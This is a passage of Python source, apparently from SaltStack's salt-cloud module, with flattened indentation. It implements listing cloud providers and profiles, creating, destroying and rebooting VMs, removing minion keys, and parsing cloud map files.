for alias, info in six.iteritems(self.opts["profiles"]):
providers = info.get("provider")
if providers:
given_prov_name = providers.split(":")[0]
salt_prov_name = providers.split(":")[1]
if given_prov_name == provider:
provider_profiles.add((alias, given_prov_name))
elif salt_prov_name == provider:
provider_profiles.add((alias, salt_prov_name))
profiles.add((alias, given_prov_name))
if not profiles:
raise SaltCloudSystemExit("There are no cloud profiles configured.")
if provider != "all":
return provider_profiles
return profiles
def map_providers(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
pmap = {}
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver, details in six.iteritems(drivers):
fun = "{0}.{1}".format(driver, query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
if alias not in pmap:
pmap[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
pmap[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for "
"running nodes: %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any
# nodes
pmap[alias][driver] = []
self.__cached_provider_queries[query] = pmap
return pmap
def map_providers_parallel(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
Same as map_providers but query in parallel.
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
opts = self.opts.copy()
multiprocessing_data = []
# Optimize Providers
opts["providers"] = self._optimize_providers(opts["providers"])
for alias, drivers in six.iteritems(opts["providers"]):
# Make temp query for this driver to avoid overwrite next
this_query = query
for driver, details in six.iteritems(drivers):
# If driver has function list_nodes_min, just replace it
# with query param to check existing vms on this driver
# for minimum information, Otherwise still use query param.
if (
opts.get("selected_query_option") is None
and "{0}.list_nodes_min".format(driver) in self.clouds
):
this_query = "list_nodes_min"
fun = "{0}.{1}".format(driver, this_query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
multiprocessing_data.append(
{
"fun": fun,
"opts": opts,
"query": this_query,
"alias": alias,
"driver": driver,
}
)
output = {}
if not multiprocessing_data:
return output
data_count = len(multiprocessing_data)
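        # 'data_count < 10 and data_count or 10' below is an old-style
        # conditional expression that caps the pool at 10 worker processes
        # (effectively min(data_count, 10), since data_count is at least 1 here).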
pool = multiprocessing.Pool(
data_count < 10 and data_count or 10, init_pool_worker
)
parallel_pmap = enter_mainloop(
_run_parallel_map_providers_query, multiprocessing_data, pool=pool
)
for alias, driver, details in parallel_pmap:
if not details:
# There's no providers details?! Skip it!
continue
if alias not in output:
output[alias] = {}
output[alias][driver] = details
self.__cached_provider_queries[query] = output
return output
def get_running_by_names(
self, names, query="list_nodes", cached=False, profile=None
):
if isinstance(names, six.string_types):
names = [names]
matches = {}
handled_drivers = {}
mapped_providers = self.map_providers_parallel(query, cached=cached)
for alias, drivers in six.iteritems(mapped_providers):
for driver, vms in six.iteritems(drivers):
if driver not in handled_drivers:
handled_drivers[driver] = alias
# When a profile is specified, only return an instance
# that matches the provider specified in the profile.
# This solves the issues when many providers return the
# same instance. For example there may be one provider for
# each availability zone in amazon in the same region, but
# the search returns the same instance for each provider
# because amazon returns all instances in a region, not
# availability zone.
if (
profile
and alias
not in self.opts["profiles"][profile]["provider"].split(":")[0]
):
continue
for vm_name, details in six.iteritems(vms):
# XXX: The logic below can be removed once the aws driver
# is removed
if vm_name not in names:
continue
elif (
driver == "ec2"
and "aws" in handled_drivers
and "aws" in matches[handled_drivers["aws"]]
and vm_name in matches[handled_drivers["aws"]]["aws"]
):
continue
elif (
driver == "aws"
and "ec2" in handled_drivers
and "ec2" in matches[handled_drivers["ec2"]]
and vm_name in matches[handled_drivers["ec2"]]["ec2"]
):
continue
if alias not in matches:
matches[alias] = {}
if driver not in matches[alias]:
matches[alias][driver] = {}
matches[alias][driver][vm_name] = details
return matches
def _optimize_providers(self, providers):
"""
Return an optimized mapping of available providers
"""
new_providers = {}
provider_by_driver = {}
for alias, driver in six.iteritems(providers):
for name, data in six.iteritems(driver):
if name not in provider_by_driver:
provider_by_driver[name] = {}
provider_by_driver[name][alias] = data
for driver, providers_data in six.iteritems(provider_by_driver):
fun = "{0}.optimize_providers".format(driver)
if fun not in self.clouds:
log.debug("The '%s' cloud driver is unable to be optimized.", driver)
for name, prov_data in six.iteritems(providers_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
continue
new_data = self.clouds[fun](providers_data)
if new_data:
for name, prov_data in six.iteritems(new_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
return new_providers
def location_list(self, lookup="all"):
"""
Return a mapping of all location data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_locations".format(driver)
if fun not in self.clouds:
# The capability to gather locations is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the locations information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def image_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_images".format(driver)
if fun not in self.clouds:
# The capability to gather images is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the images information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def size_list(self, lookup="all"):
"""
        Return a mapping of all size data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_sizes".format(driver)
if fun not in self.clouds:
# The capability to gather sizes is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the sizes information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def provider_list(self, lookup="all"):
"""
        Return a mapping of all configured providers and their drivers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def profile_list(self, provider, lookup="all"):
"""
Return a mapping of all configured profiles
"""
data = {}
lookups = self.lookup_profiles(provider, lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def create_all(self):
"""
Create/Verify the VMs in the VM data
"""
ret = []
for vm_name, vm_details in six.iteritems(self.opts["profiles"]):
ret.append({vm_name: self.create(vm_details)})
return ret
def destroy(self, names, cached=False):
"""
Destroy the named VMs
"""
processed = {}
names = set(names)
matching = self.get_running_by_names(names, cached=cached)
vms_to_destroy = set()
parallel_data = []
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for name in vms:
if name in names:
vms_to_destroy.add((alias, driver, name))
if self.opts["parallel"]:
parallel_data.append(
{
"opts": self.opts,
"name": name,
"alias": alias,
"driver": driver,
}
)
# destroying in parallel
if self.opts["parallel"] and parallel_data:
# set the pool size based on configuration or default to
# the number of machines we're destroying
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Destroying in parallel mode; " "Cloud pool size: %s", pool_size)
# kick off the parallel destroy
output_multip = enter_mainloop(
_destroy_multiprocessing, parallel_data, pool_size=pool_size
)
# massage the multiprocessing output a bit
ret_multip = {}
for obj in output_multip:
ret_multip.update(obj)
# build up a data structure similar to what the non-parallel
# destroy uses
for obj in parallel_data:
alias = obj["alias"]
driver = obj["driver"]
name = obj["name"]
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret_multip[name]
if name in names:
names.remove(name)
# not destroying in parallel
else:
log.info("Destroying in non-parallel mode.")
for alias, driver, name in vms_to_destroy:
fun = "{0}.destroy".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
ret = self.clouds[fun](name)
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret
if name in names:
names.remove(name)
# now the processed data structure contains the output from either
# the parallel or non-parallel destroy and we should finish up
# with removing minion keys if necessary
for alias, driver, name in vms_to_destroy:
ret = processed[alias][driver][name]
if not ret:
continue
vm_ = {
"name": name,
"profile": None,
"provider": ":".join([alias, driver]),
"driver": driver,
}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
key_file = os.path.join(
self.opts["pki_dir"], "minions", minion_dict.get("id", name)
)
globbed_key_file = glob.glob("{0}.*".format(key_file))
if not os.path.isfile(key_file) and not globbed_key_file:
# There's no such key file!? It might have been renamed
if isinstance(ret, dict) and "newname" in ret:
salt.utils.cloud.remove_key(self.opts["pki_dir"], ret["newname"])
continue
if os.path.isfile(key_file) and not globbed_key_file:
# Single key entry. Remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(key_file)
)
continue
            # Since we have globbed matches, there are probably some keys whose
            # minion configuration has append_domain set.
if (
not os.path.isfile(key_file)
and globbed_key_file
and len(globbed_key_file) == 1
):
# Single entry, let's remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(globbed_key_file[0])
)
continue
            # Since we can't get the profile or map entry used to create
            # the VM, we also can't get the append_domain setting.
            # If we reached this point, there are several minion keys
            # whose names start with the machine name we're deleting.
            # We need to ask about them one by one.
print(
"There are several minion keys who's name starts "
"with '{0}'. We need to ask you which one should be "
"deleted:".format(name)
)
while True:
for idx, filename in enumerate(globbed_key_file):
print(" {0}: {1}".format(idx, os.path.basename(filename)))
selection = input("Which minion key should be deleted(number)? ")
try:
selection = int(selection)
except ValueError:
print("'{0}' is not a valid selection.".format(selection))
try:
filename = os.path.basename(globbed_key_file.pop(selection))
except Exception: # pylint: disable=broad-except
continue
delete = input("Delete '{0}'? [Y/n]? ".format(filename))
if delete == "" or delete.lower().startswith("y"):
salt.utils.cloud.remove_key(self.opts["pki_dir"], filename)
print("Deleted '{0}'".format(filename))
break
print("Did not delete '{0}'".format(filename))
break
if names and not processed:
# These machines were asked to be destroyed but could not be found
raise SaltCloudSystemExit(
"The following VM's were not found: {0}".format(", ".join(names))
)
elif names and processed:
processed["Not Found"] = names
elif not processed:
raise SaltCloudSystemExit("No machines were destroyed!")
return processed
def reboot(self, names):
"""
Reboot the named VMs
"""
ret = []
pmap = self.map_providers_parallel()
acts = {}
for prov, nodes in six.iteritems(pmap):
acts[prov] = []
for node in nodes:
if node in names:
acts[prov].append(node)
for prov, names_ in six.iteritems(acts):
fun = "{0}.reboot".format(prov)
for name in names_:
ret.append({name: self.clouds[fun](name)})
return ret
def create(self, vm_, local_master=True):
"""
Create a single VM
"""
output = {}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
alias, driver = vm_["provider"].split(":")
fun = "{0}.create".format(driver)
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
vm_["name"],
vm_["provider"],
driver,
)
return
deploy = salt.config.get_cloud_config_value("deploy", vm_, self.opts)
make_master = salt.config.get_cloud_config_value("make_master", vm_, self.opts)
if deploy:
if not make_master and "master" not in minion_dict:
log.warning(
"There's no master defined on the '%s' VM settings.", vm_["name"]
)
if "pub_key" not in vm_ and "priv_key" not in vm_:
log.debug("Generating minion keys for '%s'", vm_["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["pub_key"] = pub
vm_["priv_key"] = priv
else:
# Note(pabelanger): We still reference pub_key and priv_key when
# deploy is disabled.
vm_["pub_key"] = None
vm_["priv_key"] = None
key_id = minion_dict.get("id", vm_["name"])
domain = vm_.get("domain")
if vm_.get("use_fqdn") and domain:
minion_dict["append_domain"] = domain
if "append_domain" in minion_dict:
key_id = ".".join([key_id, minion_dict["append_domain"]])
if make_master is True and "master_pub" not in vm_ and "master_pem" not in vm_:
log.debug("Generating the master keys for '%s'", vm_["name"])
master_priv, master_pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["master_pub"] = master_pub
vm_["master_pem"] = master_priv
if local_master is True and deploy is True:
# Accept the key on the local master
salt.utils.cloud.accept_key(self.opts["pki_dir"], vm_["pub_key"], key_id)
vm_["os"] = salt.config.get_cloud_config_value("script", vm_, self.opts)
try:
vm_["inline_script"] = salt.config.get_cloud_config_value(
"inline_script", vm_, self.opts
)
except KeyError:
pass
try:
alias, driver = vm_["provider"].split(":")
func = "{0}.create".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
output = self.clouds[func](vm_)
if output is not False and "sync_after_install" in self.opts:
if self.opts["sync_after_install"] not in (
"all",
"modules",
"states",
"grains",
):
log.error("Bad option for sync_after_install")
return output
# A small pause helps the sync work more reliably
time.sleep(3)
start = int(time.time())
while int(time.time()) < start + 60:
# We'll try every <timeout> seconds, up to a minute
mopts_ = salt.config.DEFAULT_MASTER_OPTS
conf_path = "/".join(self.opts["conf_file"].split("/")[:-1])
mopts_.update(
salt.config.master_config(os.path.join(conf_path, "master"))
)
client = salt.client.get_local_client(mopts=mopts_)
ret = client.cmd(
vm_["name"],
"saltutil.sync_{0}".format(self.opts["sync_after_install"]),
timeout=self.opts["timeout"],
)
if ret:
log.info(
six.u(
"Synchronized the following dynamic modules: " " {0}"
).format(ret)
)
break
except KeyError as exc:
log.exception(
"Failed to create VM %s. Configuration value %s needs " "to be set",
vm_["name"],
exc,
)
# If it's a map then we need to respect the 'requires'
# so we do it later
try:
opt_map = self.opts["map"]
except KeyError:
opt_map = False
if self.opts["parallel"] and self.opts["start_action"] and not opt_map:
log.info("Running %s on %s", self.opts["start_action"], vm_["name"])
client = salt.client.get_local_client(mopts=self.opts)
action_out = client.cmd(
vm_["name"],
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
)
output["ret"] = action_out
return output
@staticmethod
def vm_config(name, main, provider, profile, overrides):
"""
Create vm config.
:param str name: The name of the vm
:param dict main: The main cloud config
:param dict provider: The provider config
:param dict profile: The profile config
:param dict overrides: The vm's config overrides
"""
vm = main.copy()
vm = salt.utils.dictupdate.update(vm, provider)
vm = salt.utils.dictupdate.update(vm, profile)
vm.update(overrides)
vm["name"] = name
return vm
def extras(self, extra_):
"""
Extra actions
"""
output = {}
alias, driver = extra_["provider"].split(":")
fun = "{0}.{1}".format(driver, extra_["action"])
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
extra_["name"],
extra_["provider"],
driver,
)
return
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=extra_["provider"]
):
output = self.clouds[fun](**extra_)
except KeyError as exc:
log.exception(
"Failed to perform %s.%s on %s. "
"Configuration value %s needs to be set",
extra_["provider"],
extra_["action"],
extra_["name"],
exc,
)
return output
def run_profile(self, profile, names, vm_overrides=None):
"""
Parse over the options passed on the command line and determine how to
handle them
"""
if profile not in self.opts["profiles"]:
msg = "Profile {0} is not defined".format(profile)
log.error(msg)
return {"Error": msg}
ret = {}
if not vm_overrides:
vm_overrides = {}
try:
with salt.utils.files.fopen(self.opts["conf_file"], "r") as mcc:
main_cloud_config = salt.utils.yaml.safe_load(mcc)
if not main_cloud_config:
main_cloud_config = {}
except KeyError:
main_cloud_config = {}
except IOError:
main_cloud_config = {}
if main_cloud_config is None:
main_cloud_config = {}
mapped_providers = self.map_providers_parallel()
profile_details = self.opts["profiles"][profile]
vms = {}
for prov, val in six.iteritems(mapped_providers):
prov_name = next(iter(val))
for node in mapped_providers[prov][prov_name]:
vms[node] = mapped_providers[prov][prov_name][node]
vms[node]["provider"] = prov
vms[node]["driver"] = prov_name
alias, driver = profile_details["provider"].split(":")
provider_details = self.opts["providers"][alias][driver].copy()
del provider_details["profiles"]
for name in names:
if name in vms:
prov = vms[name]["provider"]
driv = vms[name]["driver"]
msg = "{0} already exists under {1}:{2}".format(name, prov, driv)
log.error(msg)
ret[name] = {"Error": msg}
continue
vm_ = self.vm_config(
name,
main_cloud_config,
provider_details,
profile_details,
vm_overrides,
)
if self.opts["parallel"]:
process = multiprocessing.Process(target=self.create, args=(vm_,))
process.start()
ret[name] = {
"Provisioning": "VM being provisioned in parallel. "
"PID: {0}".format(process.pid)
}
continue
try:
# No need to inject __active_provider_name__ into the context
# here because self.create takes care of that
ret[name] = self.create(vm_)
if not ret[name]:
ret[name] = {"Error": "Failed to deploy VM"}
if len(names) == 1:
raise SaltCloudSystemExit("Failed to deploy VM")
continue
if self.opts.get("show_deploy_args", False) is False:
ret[name].pop("deploy_kwargs", None)
except (SaltCloudSystemExit, SaltCloudConfigError) as exc:
if len(names) == 1:
raise
ret[name] = {"Error": str(exc)}
return ret
def do_action(self, names, kwargs):
"""
Perform an action on a VM which may be specific to this cloud provider
"""
ret = {}
invalid_functions = {}
names = set(names)
for alias, drivers in six.iteritems(self.map_providers_parallel()):
if not names:
break
for driver, vms in six.iteritems(drivers):
if not names:
break
valid_function = True
fun = "{0}.{1}".format(driver, self.opts["action"])
if fun not in self.clouds:
log.info("'%s()' is not available. Not actioning...", fun)
valid_function = False
for vm_name, vm_details in six.iteritems(vms):
if not names:
break
if vm_name not in names:
if not isinstance(vm_details, dict):
vm_details = {}
if "id" in vm_details and vm_details["id"] in names:
vm_name = vm_details["id"]
else:
log.debug(
"vm:%s in provider:%s is not in name " "list:'%s'",
vm_name,
driver,
names,
)
continue
# Build the dictionary of invalid functions with their associated VMs.
if valid_function is False:
if invalid_functions.get(fun) is None:
invalid_functions.update({fun: []})
invalid_functions[fun].append(vm_name)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
if alias not in ret:
ret[alias] = {}
if driver not in ret[alias]:
ret[alias][driver] = {}
# Clean kwargs of "__pub_*" data before running the cloud action call.
# Prevents calling positional "kwarg" arg before "call" when no kwarg
# argument is present in the cloud driver function's arg spec.
kwargs = salt.utils.args.clean_kwargs(**kwargs)
if kwargs:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, kwargs, call="action"
)
else:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, call="action"
)
names.remove(vm_name)
# Set the return information for the VMs listed in the invalid_functions dict.
missing_vms = set()
if invalid_functions:
ret["Invalid Actions"] = invalid_functions
invalid_func_vms = set()
for key, val in six.iteritems(invalid_functions):
invalid_func_vms = invalid_func_vms.union(set(val))
# Find the VMs that are in names, but not in set of invalid functions.
missing_vms = names.difference(invalid_func_vms)
if missing_vms:
ret["Not Found"] = list(missing_vms)
ret["Not Actioned/Not Running"] = list(names)
if not names:
return ret
        # Don't return missing VM information for invalid functions until after
        # we've had a chance to return successful actions. If a function is valid
        # for one driver, but not another, we want to make sure the successful
        # action is returned properly.
if missing_vms:
return ret
        # If we reach this point, the Not Actioned and Not Found lists will be the
        # same, but we want to list both for clarity/consistency with the invalid
        # functions lists.
ret["Not Actioned/Not Running"] = list(names)
ret["Not Found"] = list(names)
return ret
def do_function(self, prov, func, kwargs):
"""
Perform a function against a cloud provider
"""
matches = self.lookup_providers(prov)
if len(matches) > 1:
raise SaltCloudSystemExit(
"More than one results matched '{0}'. Please specify "
"one of: {1}".format(
prov,
", ".join(
["{0}:{1}".format(alias, driver) for (alias, driver) in matches]
),
)
)
alias, driver = matches.pop()
fun = "{0}.{1}".format(driver, func)
if fun not in self.clouds:
raise SaltCloudSystemExit(
"The '{0}' cloud provider alias, for the '{1}' driver, does "
"not define the function '{2}'".format(alias, driver, func)
)
log.debug("Trying to execute '%s' with the following kwargs: %s", fun, kwargs)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if kwargs:
return {
alias: {driver: self.clouds[fun](call="function", kwargs=kwargs)}
}
return {alias: {driver: self.clouds[fun](call="function")}}
def __filter_non_working_providers(self):
"""
Remove any mis-configured cloud providers from the available listing
"""
for alias, drivers in six.iteritems(self.opts["providers"].copy()):
for driver in drivers.copy():
fun = "{0}.get_configured_provider".format(driver)
if fun not in self.clouds:
# Mis-configured provider that got removed?
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias, could not be loaded. "
"Please check your provider configuration files and "
"ensure all required dependencies are installed "
"for the '%s' driver.\n"
"In rare cases, this could indicate the '%s()' "
"function could not be found.\nRemoving '%s' from "
"the available providers list",
driver,
alias,
driver,
fun,
driver,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if self.clouds[fun]() is False:
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias is not properly "
"configured. Removing it from the available "
"providers list.",
driver,
alias,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
class Map(Cloud):
"""
Create a VM stateful map execution object
"""
def __init__(self, opts):
Cloud.__init__(self, opts)
self.rendered_map = self.read()
def interpolated_map(self, query="list_nodes", cached=False):
rendered_map = self.read().copy()
interpolated_map = {}
for profile, mapped_vms in six.iteritems(rendered_map):
names = set(mapped_vms)
if profile not in self.opts["profiles"]:
if "Errors" not in interpolated_map:
interpolated_map["Errors"] = {}
msg = (
"No provider for the mapped '{0}' profile was found. "
"Skipped VMS: {1}".format(profile, ", ".join(names))
)
log.info(msg)
interpolated_map["Errors"][profile] = msg
continue
matching = self.get_running_by_names(names, query, cached)
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = vm_details
try:
names.remove(vm_name)
except KeyError:
# If it's not there, then our job is already done
pass
if not names:
continue
profile_details = self.opts["profiles"][profile]
alias, driver = profile_details["provider"].split(":")
for vm_name in names:
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = "Absent"
return interpolated_map
def delete_map(self, query=None):
query_map = self.interpolated_map(query=query)
for alias, drivers in six.iteritems(query_map.copy()):
for driver, vms in six.iteritems(drivers.copy()):
for vm_name, vm_details in six.iteritems(vms.copy()):
if vm_details == "Absent":
query_map[alias][driver].pop(vm_name)
if not query_map[alias][driver]:
query_map[alias].pop(driver)
if not query_map[alias]:
query_map.pop(alias)
return query_map
def get_vmnames_by_action(self, action):
query_map = self.interpolated_map("list_nodes")
matching_states = {
"start": ["stopped"],
"stop": ["running", "active"],
"reboot": ["running", "active"],
}
vm_names = []
for alias, drivers in six.iteritems(query_map):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
                    # Only certain actions are supported in this case: the
                    # "global" salt-cloud actions defined in the "matching_states"
                    # dictionary above. If a more specific action is passed in,
                    # we shouldn't stack-trace - exit gracefully instead.
try:
state_action = matching_states[action]
except KeyError:
log.error(
"The use of '%s' as an action is not supported "
"in this context. Only 'start', 'stop', and "
"'reboot' are supported options.",
action,
)
raise SaltCloudException()
if (
vm_details != "Absent"
and vm_details["state"].lower() in state_action
):
vm_names.append(vm_name)
return vm_names
def read(self):
"""
Read in the specified map and return the map structure
"""
map_ = None
if self.opts.get("map", None) is None:
if self.opts.get("map_data", None) is None:
if self.opts.get("map_pillar", None) is None:
pass
elif self.opts.get("map_pillar") not in self.opts.get("maps"):
log.error(
"The specified map not found in pillar at " "'cloud:maps:%s'",
self.opts["map_pillar"],
)
raise SaltCloudNotFound()
else:
# 'map_pillar' is provided, try to use it
map_ = self.opts["maps"][self.opts.get("map_pillar")]
else:
# 'map_data' is provided, try to use it
map_ = self.opts["map_data"]
else:
# 'map' is provided, try to use it
local_minion_opts = copy.deepcopy(self.opts)
local_minion_opts["file_client"] = "local"
self.minion = salt.minion.MasterMinion(local_minion_opts)
if not os.path.isfile(self.opts["map"]):
if not (self.opts["map"]).startswith("salt://"):
log.error(
"The specified map file does not exist: '%s'", self.opts["map"]
)
raise SaltCloudNotFound()
if (self.opts["map"]).startswith("salt://"):
cached_map = self.minion.functions["cp.cache_file"](self.opts["map"])
else:
cached_map = self.opts["map"]
try:
renderer = self.opts.get("renderer", "jinja|yaml")
rend = salt.loader.render(self.opts, {})
blacklist = self.opts.get("renderer_blacklist")
whitelist = self.opts.get("renderer_whitelist")
map_ = compile_template(
cached_map, rend, renderer, blacklist, whitelist
)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Rendering map %s failed, render error:\n%s",
self.opts["map"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {}
if "include" in map_:
map_ = salt.config.include_config(map_, self.opts["map"], verbose=False)
if not map_:
return {}
# Create expected data format if needed
for profile, mapped in six.iteritems(map_.copy()):
if isinstance(mapped, (list, tuple)):
entries = {}
for mapping in mapped:
if isinstance(mapping, six.string_types):
# Foo:
# - bar1
# - bar2
mapping = {mapping: None}
for name, overrides in six.iteritems(mapping):
if overrides is None or isinstance(overrides, bool):
# Foo:
# - bar1:
# - bar2:
overrides = {}
try:
overrides.setdefault("name", name)
except AttributeError:
log.error(
"Cannot use 'name' as a minion id in a cloud map as it "
"is a reserved word. Please change 'name' to a different "
"minion id reference."
)
return {}
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, dict):
# Convert the dictionary mapping to a list of dictionaries
# Foo:
# bar1:
# grains:
# foo: bar
# bar2:
# grains:
# foo: bar
entries = {}
for name, overrides in six.iteritems(mapped):
overrides.setdefault("name", name)
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, six.string_types):
                # If it's a single string entry, make it iterable so the
                # next step can handle it uniformly
mapped = [mapped]
map_[profile] = {}
for name in mapped:
map_[profile][name] = {"name": name}
return map_
def _has_loop(self, dmap, seen=None, val=None):
if seen is None:
for values in six.itervalues(dmap["create"]):
seen = []
try:
machines = values["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
else:
if val in seen:
return True
seen.append(val)
try:
machines = dmap["create"][val]["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
return False
def _calcdep(self, dmap, machine, data, level):
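        # Dependency depth: a machine with no 'requires' keeps the incoming
        # level; otherwise its level is one more than the maximum level of the
        # machines it requires (looked up in dmap['create'] or dmap['existing']).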
try:
deplist = data["requires"]
except KeyError:
return level
levels = []
for name in deplist:
try:
data = dmap["create"][name]
except KeyError:
try:
data = dmap["existing"][name]
except KeyError:
msg = "Missing dependency in cloud map"
log.error(msg)
raise SaltCloudException(msg)
levels.append(self._calcdep(dmap, name, data, level))
level = max(levels) + 1
return level
def map_data(self, cached=False):
"""
Create a data map of what to execute on
"""
ret = {"create": {}}
pmap = self.map_providers_parallel(cached=cached)
exist = set()
defined = set()
rendered_map = copy.deepcopy(self.rendered_map)
for profile_name, nodes in six.iteritems(rendered_map):
if profile_name not in self.opts["profiles"]:
msg = (
"The required profile, '{0}', defined in the map "
"does not exist. The defined nodes, {1}, will not "
"be created.".format(
profile_name, ", ".join("'{0}'".format(node) for node in nodes)
)
)
log.error(msg)
if "errors" not in ret:
ret["errors"] = {}
ret["errors"][profile_name] = msg
continue
profile_data = self.opts["profiles"].get(profile_name)
for nodename, overrides in six.iteritems(nodes):
# Get associated provider data, in case something like size
# or image is specified in the provider file. See issue #32510.
if (
"provider" in overrides
and overrides["provider"] != profile_data["provider"]
):
alias, driver = overrides.get("provider").split(":")
else:
alias, driver = profile_data.get("provider").split(":")
provider_details = copy.deepcopy(self.opts["providers"][alias][driver])
del provider_details["profiles"]
# Update the provider details information with profile data
# Profile data and node overrides should override provider data, if defined.
# This keeps map file data definitions consistent with -p usage.
salt.utils.dictupdate.update(provider_details, profile_data)
nodedata = copy.deepcopy(provider_details)
# Update profile data with the map overrides
for setting in ("grains", "master", "minion", "volumes", "requires"):
deprecated = "map_{0}".format(setting)
if deprecated in overrides:
log.warning(
"The use of '%s' on the '%s' mapping has "
"been deprecated. The preferred way now is to "
"just define '%s'. For now, salt-cloud will do "
"the proper thing and convert the deprecated "
"mapping into the preferred one.",
deprecated,
nodename,
setting,
)
overrides[setting] = overrides.pop(deprecated)
# merge minion grains from map file
if (
"minion" in overrides
and "minion" in nodedata
and "grains" in overrides["minion"]
